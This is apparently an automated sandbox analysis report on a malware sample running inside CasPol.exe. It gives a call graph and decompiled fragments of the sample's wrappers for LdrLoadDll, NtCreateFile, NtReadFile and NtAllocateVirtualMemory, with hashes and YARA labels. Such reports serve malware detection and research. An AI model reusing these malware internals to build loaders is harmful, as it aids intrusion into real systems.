23607->23610 23608->23541 23611 418c22 23609->23611 23610->23541 23611->23541 23623 418c43 23614->23623 23640 41e643 23614->23640 23615 418c97 23616 418cae 23615->23616 23648 41e4d3 LdrLoadDll 23615->23648 23618 418cb5 23616->23618 23619 418cca 23616->23619 23621 41e6c3 2 API calls 23618->23621 23620 41e6c3 2 API calls 23619->23620 23622 418cd3 23620->23622 23621->23623 23624 418cff 23622->23624 23643 41ff33 23622->23643 23623->23541 23624->23541 23626 418cea 23627 420133 2 API calls 23626->23627 23628 418cf3 23627->23628 23628->23541 23629->23514 23630->23537 23632 41f203 LdrLoadDll 23631->23632 23633 419475 23631->23633 23632->23633 23634 41e553 LdrLoadDll 23633->23634 23634->23540 23635->23523 23636->23586 23639 42022b 23637->23639 23650 41e863 23637->23650 23639->23614 23641 41f203 LdrLoadDll 23640->23641 23642 41e65f NtReadFile 23641->23642 23642->23615 23644 41ff40 23643->23644 23645 41ff57 23643->23645 23644->23645 23646 420213 2 API calls 23644->23646 23645->23626 23647 41ff6e 23646->23647 23647->23626 23648->23616 23649->23603 23651 41f203 LdrLoadDll 23650->23651 23652 41e87f RtlAllocateHeap 23651->23652 23652->23639 23654 4200e0 23653->23654 23777 41e773 23653->23777 23654->23548 23657 4187b4 23656->23657 23659 4187bc 23656->23659 23657->23550 23658 418a8f 23658->23550 23659->23658 23780 4212b3 23659->23780 23661 418810 23662 4212b3 2 API calls 23661->23662 23666 41881b 23662->23666 23663 418869 23665 4212b3 2 API calls 23663->23665 23667 41887d 23665->23667 23666->23663 23785 421353 23666->23785 23668 4212b3 2 API calls 23667->23668 23670 4188f0 23668->23670 23669 4212b3 2 API calls 23678 418938 23669->23678 23670->23669 23672 418a67 23792 421313 LdrLoadDll RtlFreeHeap 23672->23792 23674 418a71 23793 421313 LdrLoadDll RtlFreeHeap 23674->23793 23676 418a7b 23794 421313 LdrLoadDll RtlFreeHeap 23676->23794 23791 421313 LdrLoadDll RtlFreeHeap 23678->23791 23679 418a85 23795 421313 LdrLoadDll RtlFreeHeap 23679->23795 23682 419b14 23681->23682 23683 4191a3 8 API calls 23682->23683 23686 419b2a 23683->23686 23684 419b33 23684->23553 23685 419b6a 23687 420133 2 API calls 23685->23687 23686->23684 23686->23685 23689 419bb6 23686->23689 23688 419b7b 23687->23688 23688->23553 23690 420133 2 API calls 23689->23690 23691 419bbb 23690->23691 23691->23553 23796 41ee83 23692->23796 23694 41f007 23695 41ee83 LdrLoadDll 23694->23695 23696 41f010 23695->23696 23697 41ee83 LdrLoadDll 23696->23697 23698 41f019 23697->23698 23699 41ee83 LdrLoadDll 23698->23699 23700 41f022 23699->23700 23701 41ee83 LdrLoadDll 23700->23701 23702 41f02b 23701->23702 23703 41ee83 LdrLoadDll 23702->23703 23704 41f034 23703->23704 23705 41ee83 LdrLoadDll 23704->23705 23706 41f040 23705->23706 23707 41ee83 LdrLoadDll 23706->23707 23708 41f049 23707->23708 23709 41ee83 LdrLoadDll 23708->23709 23710 41f052 23709->23710 23711 41ee83 LdrLoadDll 23710->23711 23712 41f05b 23711->23712 23713 41ee83 LdrLoadDll 23712->23713 23714 41f064 23713->23714 23715 41ee83 LdrLoadDll 23714->23715 23716 41f06d 23715->23716 23717 41ee83 LdrLoadDll 23716->23717 23718 41f079 23717->23718 23719 41ee83 LdrLoadDll 23718->23719 23720 41f082 23719->23720 23721 41ee83 LdrLoadDll 23720->23721 23722 41f08b 23721->23722 23723 41ee83 LdrLoadDll 23722->23723 23724 41f094 23723->23724 23725 41ee83 LdrLoadDll 23724->23725 23726 41f09d 23725->23726 23727 41ee83 LdrLoadDll 23726->23727 23728 41f0a6 23727->23728 23729 41ee83 LdrLoadDll 23728->23729 23730 41f0b2 23729->23730 23731 41ee83 LdrLoadDll 23730->23731 23732 41f0bb 23731->23732 23733 41ee83 LdrLoadDll 23732->23733 23734 41f0c4 23733->23734 23735 41ee83 LdrLoadDll 23734->23735 23736 41f0cd 23735->23736 23737 41ee83 LdrLoadDll 23736->23737 23738 41f0d6 23737->23738 23739 41ee83 LdrLoadDll 23738->23739 23740 41f0df 23739->23740 23741 41ee83 LdrLoadDll 23740->23741 23742 41f0eb 23741->23742 23743 41ee83 LdrLoadDll 23742->23743 23744 41f0f4 23743->23744 23745 41ee83 LdrLoadDll 23744->23745 23746 41f0fd 23745->23746 23747 41ee83 LdrLoadDll 23746->23747 23748 41f106 23747->23748 23749 41ee83 LdrLoadDll 23748->23749 23750 41f10f 23749->23750 23751 41ee83 LdrLoadDll 23750->23751 23752 41f118 23751->23752 23753 41ee83 LdrLoadDll 23752->23753 23754 41f124 23753->23754 23755 41ee83 LdrLoadDll 23754->23755 23756 41f12d 23755->23756 23757 41ee83 LdrLoadDll 23756->23757 23758 41f136 23757->23758 23759 41ee83 LdrLoadDll 23758->23759 23760 41f13f 23759->23760 23761 41ee83 LdrLoadDll 23760->23761 23762 41f148 23761->23762 23763 41ee83 LdrLoadDll 23762->23763 23764 41f151 23763->23764 23765 41ee83 LdrLoadDll 23764->23765 23766 41f15d 23765->23766 23767 41ee83 LdrLoadDll 23766->23767 23768 41f166 23767->23768 23769 41ee83 LdrLoadDll 23768->23769 23770 41f16f 23769->23770 23770->23558 23772 41f203 LdrLoadDll 23771->23772 23773 41e10f 23772->23773 23802 1439860 LdrInitializeThunk 23773->23802 23774 41e126 23774->23560 23776->23555 23778 41e78f NtAllocateVirtualMemory 23777->23778 23779 41f203 LdrLoadDll 23777->23779 23778->23654 23779->23778 23781 4212c3 23780->23781 23782 4212c9 23780->23782 23781->23661 23783 420213 2 API calls 23782->23783 23784 4212ef 23783->23784 23784->23661 23786 421378 23785->23786 23787 4213b0 23785->23787 23788 420213 2 API calls 23786->23788 23787->23666 23789 42138d 23788->23789 23790 420133 2 API calls 23789->23790 23790->23787 23791->23672 23792->23674 23793->23676 23794->23679 23795->23658 23797 41ee9e 23796->23797 23798 4195b3 LdrLoadDll 23797->23798 23799 41eebe 23798->23799 23800 4195b3 LdrLoadDll 23799->23800 23801 41ef72 23799->23801 23800->23801 23801->23694 23801->23801 23802->23774 23804 1439681 23803->23804 23805 143968f LdrInitializeThunk 23803->23805 23804->23564 23805->23564 23807 41e8bf RtlFreeHeap 23806->23807 23808 41f203 LdrLoadDll 23806->23808 23807->23567 23808->23807 23810 4094b3 23809->23810 23811 4094ae 23809->23811 23812 4200b3 2 API calls 23810->23812 23811->23498 23818 4094d8 23812->23818 23813 40953b 23813->23498 23814 41e0f3 2 API calls 23814->23818 23815 409541 23817 409567 23815->23817 23819 41e7f3 2 API calls 23815->23819 23817->23498 23818->23813 23818->23814 23818->23815 23820 4200b3 2 API calls 23818->23820 23825 41e7f3 23818->23825 23821 409558 23819->23821 23820->23818 23821->23498 23823 41e7f3 2 API calls 23822->23823 23824 409781 23823->23824 23824->23455 23826 41f203 LdrLoadDll 23825->23826 23827 41e80f 23826->23827 23830 14396e0 LdrInitializeThunk 23827->23830 23828 41e826 23828->23818 23830->23828 23832 41f896 23831->23832 23833 40cf93 LdrLoadDll 23832->23833 23834 40be44 23833->23834 23834->23463 23836 40d306 23835->23836 23838 40d383 23836->23838 23847 41dec3 LdrLoadDll 23836->23847 23838->23468 23840 41ea22 LookupPrivilegeValueW 23839->23840 23841 41f203 LdrLoadDll 23839->23841 23840->23473 23841->23840 23843 41f203 LdrLoadDll 23842->23843 23844 41e4af 23843->23844 23848 1439910 LdrInitializeThunk 23844->23848 23845 41e4ce 23845->23472 23847->23838 23848->23845 23850 40d48a 23849->23850 23851 40d2e3 LdrLoadDll 23850->23851 23852 40d4ed 23851->23852 23852->23425 23854 40ffed 23853->23854 23862 4100a3 23853->23862 23855 40d2e3 LdrLoadDll 23854->23855 23856 41000f 23855->23856 23863 41e173 23856->23863 23858 410051 23859 410097 23858->23859 23866 41e1b3 23858->23866 23861 41e6c3 2 API calls 23859->23861 23861->23862 23862->23429 23862->23430 23864 41e18f 23863->23864 23865 41f203 LdrLoadDll 23863->23865 23864->23858 23865->23864 23867 41e1cf 23866->23867 23868 41f203 LdrLoadDll 23866->23868 23871 1439fe0 LdrInitializeThunk 23867->23871 23868->23867 23869 41e1e6 23869->23859 23871->23869 23873 40de0e 23872->23873 23874 40d463 LdrLoadDll 23873->23874 23875 40de65 23874->23875 23908 40d0e3 23875->23908 23877 40e0dc 23877->23441 23878 40de8b 23878->23877 23917 418ad3 23878->23917 23880 40ded0 23880->23877 23920 40a0d3 23880->23920 23882 40df14 23882->23877 23942 41e733 23882->23942 23886 40df6a 23887 40df71 23886->23887 23954 41e243 23886->23954 23889 420133 2 API calls 23887->23889 23891 40df7e 23889->23891 23891->23441 23892 40dfbb 23893 420133 2 API calls 23892->23893 23894 40dfc2 23893->23894 23894->23441 23895 40dfcb 23896 410193 3 API calls 23895->23896 23897 40e03f 23896->23897 23897->23887 23898 40e04a 23897->23898 23899 420133 2 API calls 23898->23899 23900 40e06e 23899->23900 23959 41e293 23900->23959 23903 41e243 2 API calls 23904 40e0a9 23903->23904 23904->23877 23964 41e053 23904->23964 23907 41e8e3 2 API calls 23907->23877 23909 40d0f0 23908->23909 23910 40d0f4 23908->23910 23909->23878 23911 40d10d 23910->23911 23912 40d13f 23910->23912 23969 41df03 LdrLoadDll 23911->23969 23970 41df03 LdrLoadDll 23912->23970 23914 40d150 23914->23878 23916 40d12f 23916->23878 23918 410193 3 API calls 23917->23918 23919 418af9 23918->23919 23919->23880 23971 40a303 23920->23971 23922 40a2f9 23922->23882 23923 40a0f1 23923->23922 23924 4094a3 4 API calls 23923->23924 23925 40a1cf 23923->23925 23931 40a12f 23924->23931 23925->23922 23927 4094a3 4 API calls 23925->23927 23941 40a2af 23925->23941 23929 40a20c 23927->23929 23928 40a2c3 23928->23922 24019 410403 10 API calls 23928->24019 23938 409db3 14 API calls 23929->23938 23939 40a2a5 23929->23939 23929->23941 23931->23925 23936 40a1c5 23931->23936 23985 409db3 23931->23985 23932 40a2d9 23932->23922 24020 410403 10 API calls 23932->24020 23934 40a2ef 23934->23882 23937 409763 2 API calls 23936->23937 23937->23925 23938->23929 23940 409763 2 API calls 23939->23940 23940->23941 23941->23922 24018 410403 10 API calls 23941->24018 23943 41f203 LdrLoadDll 23942->23943 23944 41e74f 23943->23944 23945 40df4b 23944->23945 24102 14398f0 LdrInitializeThunk 23944->24102 23947 410193 23945->23947 23948 4101b0 23947->23948 24103 41e1f3 23948->24103 23951 4101f8 23951->23886 23952 41e243 2 API calls 23953 410221 23952->23953 23953->23886 23955 41f203 LdrLoadDll 23954->23955 23956 41e25f 23955->23956 24109 1439780 LdrInitializeThunk 23956->24109 23957 40dfae 23957->23892 23957->23895 23960 41f203 LdrLoadDll 23959->23960 23961 41e2af 23960->23961 24110 14397a0 LdrInitializeThunk 23961->24110 23962 40e082 23962->23903 23965 41f203 LdrLoadDll 23964->23965 23966 41e06f 23965->23966 24111 1439a20 LdrInitializeThunk 23966->24111 23967 40e0d5 23967->23907 23969->23916 23970->23914 23972 40a32a 23971->23972 23973 4094a3 4 API calls 23972->23973 23980 40a58f 23972->23980 23974 40a37d 23973->23974 23975 409763 2 API calls 23974->23975 23974->23980 23976 40a40c 23975->23976 23977 4094a3 4 API calls 23976->23977 23976->23980 23978 40a421 23977->23978 23979 409763 2 API calls 23978->23979 23978->23980 23983 40a481 23979->23983 23980->23923 23981 4094a3 4 API calls 23981->23983 23982 409db3 14 API calls 23982->23983 23983->23980 23983->23981 23983->23982 23984 409763 2 API calls 23983->23984 23984->23983 23986 409dd8 23985->23986 24021 41df43 23986->24021 23989 409e2c 23989->23931 23990 409ead 24054 4102e3 LdrLoadDll NtClose 23990->24054 23991 41e133 2 API calls 23992 409e50 23991->23992 23992->23990 23994 409e5b 23992->23994 24001 409ed9 23994->24001 24024 40e0f3 23994->24024 23995 409ec8 23996 409ee5 23995->23996 23997 409ecf 23995->23997 24055 41dfc3 LdrLoadDll 23996->24055 24000 41e6c3 2 API calls 23997->24000 23999 409e75 23999->24001 24044 409be3 23999->24044 24000->24001 24001->23931 24003 409f10 24005 40e0f3 5 API calls 24003->24005 24007 409f30 24005->24007 24007->24001 24056 41dff3 LdrLoadDll 24007->24056 24009 409f55 24057 41e083 LdrLoadDll 24009->24057 24011 409f6f 24012 41e053 2 API calls 24011->24012 24013 409f7e 24012->24013 24014 41e6c3 2 API calls 24013->24014 24015 409f88 24014->24015 24058 4099b3 24015->24058 24017 409f9c 24017->23931 24018->23928 24019->23932 24020->23934 24022 41f203 LdrLoadDll 24021->24022 24023 409e22 24022->24023 24023->23989 24023->23990 24023->23991 24025 40e121 24024->24025 24026 410193 3 API calls 24025->24026 24027 40e183 24026->24027 24028 40e1cc 24027->24028 24029 41e243 2 API calls 24027->24029 24028->23999 24030 40e1ae 24029->24030 24031 40e1b8 24030->24031 24035 40e1d8 24030->24035 24032 41e293 2 API calls 24031->24032 24033 40e1c2 24032->24033 24034 41e6c3 2 API calls 24033->24034 24034->24028 24036 40e262 24035->24036 24037 40e245 24035->24037 24038 41e293 2 API calls 24036->24038 24039 41e6c3 2 API calls 24037->24039 24040 40e271 24038->24040 24041 40e24f 24039->24041 24042 41e6c3 2 API calls 24040->24042 24041->23999 24043 40e27b 24042->24043 24043->23999 24045 409bf9 24044->24045 24050 409d84 24045->24050 24074 4097a3 24045->24074 24047 409cf8 24048 4099b3 11 API calls 24047->24048 24047->24050 24049 409d26 24048->24049 24049->24050 24051 41e133 2 API calls 24049->24051 24050->23931 24052 409d5b 24051->24052 24052->24050 24053 41e733 2 API calls 24052->24053 24053->24050 24054->23995 24055->24003 24056->24009 24057->24011 24059 4099dc 24058->24059 24081 409913 24059->24081 24062 41e733 2 API calls 24063 4099ef 24062->24063 24063->24062 24064 409a7a 24063->24064 24067 409a75 24063->24067 24089 410363 24063->24089 24064->24017 24065 41e6c3 2 API calls 24066 409aad 24065->24066 24066->24064 24068 41df43 LdrLoadDll 24066->24068 24067->24065 24069 409b12 24068->24069 24069->24064 24093 41df83 24069->24093 24071 409b76 24071->24064 24072 4191a3 8 API calls 24071->24072 24073 409bcb 24072->24073 24073->24017 24075 4098a2 24074->24075 24076 4097b8 24074->24076 24075->24047 24076->24075 24077 4191a3 8 API calls 24076->24077 24078 409825 24077->24078 24079 420133 2 API calls 24078->24079 24080 40984c 24078->24080 24079->24080 24080->24047 24082 40992d 24081->24082 24083 40cf93 LdrLoadDll 24082->24083 24084 409948 24083->24084 24085 4195b3 LdrLoadDll 24084->24085 24086 409960 24085->24086 24087 40997c 24086->24087 24088 409969 PostThreadMessageW 24086->24088 24087->24063 24088->24087 24090 410376 24089->24090 24096 41e0c3 24090->24096 24094 41df9f 24093->24094 24095 41f203 LdrLoadDll 24093->24095 24094->24071 24095->24094 24097 41f203 LdrLoadDll 24096->24097 24098 41e0df 24097->24098 24101 1439840 LdrInitializeThunk 24098->24101 24099 4103a1 24099->24063 24101->24099 24102->23945 24104 41f203 LdrLoadDll 24103->24104 24105 41e20f 24104->24105 24108 14399a0 LdrInitializeThunk 24105->24108 24106 4101f1 24106->23951 24106->23952 24108->24106 24109->23957 24110->23962 24111->23967

                                                                  Executed Functions

                                                                  Function 0040CF93 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 148 40cf93-40cfaf 149 40cfb7-40cfbc 148->149 150 40cfb2 call 420ed3 148->150 151 40cfc2-40cfd0 call 4213f3 149->151 152 40cfbe-40cfc1 149->152 150->149 155 40cfe0-40cff1 call 41f773 151->155 156 40cfd2-40cfdd call 421673 151->156 161 40cff3-40d007 LdrLoadDll 155->161 162 40d00a-40d00d 155->162 156->155 161->162
                                                                  C-Code - Quality: 100%
                                                                  			E0040CF93(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420ED3( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E004213F3(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421673( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F773(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                  0x0040cfaf
                                                                  0x0040cfb2
                                                                  0x0040cfb7
                                                                  0x0040cfbc
                                                                  0x0040cfc6
                                                                  0x0040cfcb
                                                                  0x0040cfce
                                                                  0x0040cfd0
                                                                  0x0040cfd8
                                                                  0x0040cfdd
                                                                  0x0040cfdd
                                                                  0x0040cfe4
                                                                  0x0040cfec
                                                                  0x0040cfef
                                                                  0x0040cff1
                                                                  0x0040d005
                                                                  0x00000000
                                                                  0x0040d007
                                                                  0x0040d00d
                                                                  0x0040cfc1
                                                                  0x0040cfc1
                                                                  0x0040cfc1

                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040D005
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
                                                                  • Instruction ID: bbe13f3015e6297afeaca4817b923598490fab2ca7d40facc20e4f3c260de4dd
                                                                  • Opcode Fuzzy Hash: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
                                                                  • Instruction Fuzzy Hash: D50152B1E0020DB7DB10DBE1DC82F9EB3789B14308F0041A6E908A7280F675EB498755
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E58E Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 163 41e58e-41e5e4 call 41f203 NtCreateFile
                                                                  C-Code - Quality: 79%
                                                                  			E0041E58E(void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				asm("o16 sub [eax-0x1374aae0], dh");
				_t15 = _a4;
				_t3 = _t15 + 0xa6c; // 0xa6c
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                  0x0041e58f
                                                                  0x0041e596
                                                                  0x0041e5a2
                                                                  0x0041e5aa
                                                                  0x0041e5e0
                                                                  0x0041e5e4

                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                  • Instruction ID: 3e8d1509aa00af463a8d37bfd54f617173c4f7fb56af6955cf88f9c58c8e7bef
                                                                  • Opcode Fuzzy Hash: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                  • Instruction Fuzzy Hash: DC01CFB2205148AFCB48CF99DC88EEB37A9AF8C354F058248FA4D97241C630EC51CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E593 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 166 41e593-41e5a9 167 41e5af-41e5e4 NtCreateFile 166->167 168 41e5aa call 41f203 166->168 168->167
                                                                  C-Code - Quality: 100%
                                                                  			E0041E593(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                  0x0041e5a2
                                                                  0x0041e5aa
                                                                  0x0041e5e0
                                                                  0x0041e5e4

                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                  • Instruction ID: 2b5a8fab2cb6a3536000231a5b839166af3a1201867cde8835e6817bdec1c646
                                                                  • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                  • Instruction Fuzzy Hash: AAF0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E63D Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 169 41e63d-41e659 170 41e65f-41e68c NtReadFile 169->170 171 41e65a call 41f203 169->171 171->170
                                                                  APIs
                                                                  • NtReadFile.NTDLL(004194D3,0041499B,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,0041499B,004194D3,00000002,00000000), ref: 0041E688
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                  • Instruction ID: 0c08c0e38f336dbbf35a67dda85729340189d9c1c2ca355851ac7bf132b3d8ce
                                                                  • Opcode Fuzzy Hash: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                  • Instruction Fuzzy Hash: 06F0CFB2200108ABCB14DF99DC85EEB7BA9EF8C354F158249FA0DA7241C630E911CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E643 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 172 41e643-41e68c call 41f203 NtReadFile
                                                                  C-Code - Quality: 37%
                                                                  			E0041E643(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                  0x0041e652
                                                                  0x0041e652
                                                                  0x0041e65a
                                                                  0x0041e688
                                                                  0x0041e68c

                                                                  APIs
                                                                  • NtReadFile.NTDLL(004194D3,0041499B,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,0041499B,004194D3,00000002,00000000), ref: 0041E688
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                  • Instruction ID: aa4a829568f7423d39f4ec96ffd58af37ce6892a559b0f629fddbcd99df9d704
                                                                  • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                  • Instruction Fuzzy Hash: BAF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BE0DA7241C630E8118BA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E76D Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 175 41e76d-41e7b0 call 41f203 NtAllocateVirtualMemory
                                                                  C-Code - Quality: 84%
                                                                  			E0041E76D(void* __edx, void* __fp0, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28, void* _a115) {
				intOrPtr _v117;
				long _t17;

				asm("out 0xd1, al");
				_v117 = _v117 + __edx;
				_t13 = _a4;
				_t5 = _t13 + 0x14; // 0x6ad04d03
				_t6 = _t13 + 0xa8c; // 0x404083
				E0041F203( *_t5, _a4, _t6,  *_t5, 0, 0x30);
				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t17;
			}





                                                                  0x0041e76d
                                                                  0x0041e772
                                                                  0x0041e776
                                                                  0x0041e779
                                                                  0x0041e782
                                                                  0x0041e78a
                                                                  0x0041e7ac
                                                                  0x0041e7b0

                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035F7,00000004,00001000,00000000), ref: 0041E7AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
                                                                  • Instruction ID: 864ad69e3011cdc826fcdf3463504ce9b0c8951d6cc57d2b8f66622e5bcdf5d0
                                                                  • Opcode Fuzzy Hash: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
                                                                  • Instruction Fuzzy Hash: D3F034B2600208ABCB14DF98CC41EEB37ADAF88354F118119FE0997252C630E815CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E773 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 178 41e773-41e789 179 41e78f-41e7b0 NtAllocateVirtualMemory 178->179 180 41e78a call 41f203 178->180 180->179
                                                                  C-Code - Quality: 100%
                                                                  			E0041E773(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t10 = _a4;
				_t2 = _t10 + 0x14; // 0x6ad04d03
				_t3 = _t10 + 0xa8c; // 0x404083
				E0041F203( *_t2, _a4, _t3,  *_t2, 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                  0x0041e776
                                                                  0x0041e779
                                                                  0x0041e782
                                                                  0x0041e78a
                                                                  0x0041e7ac
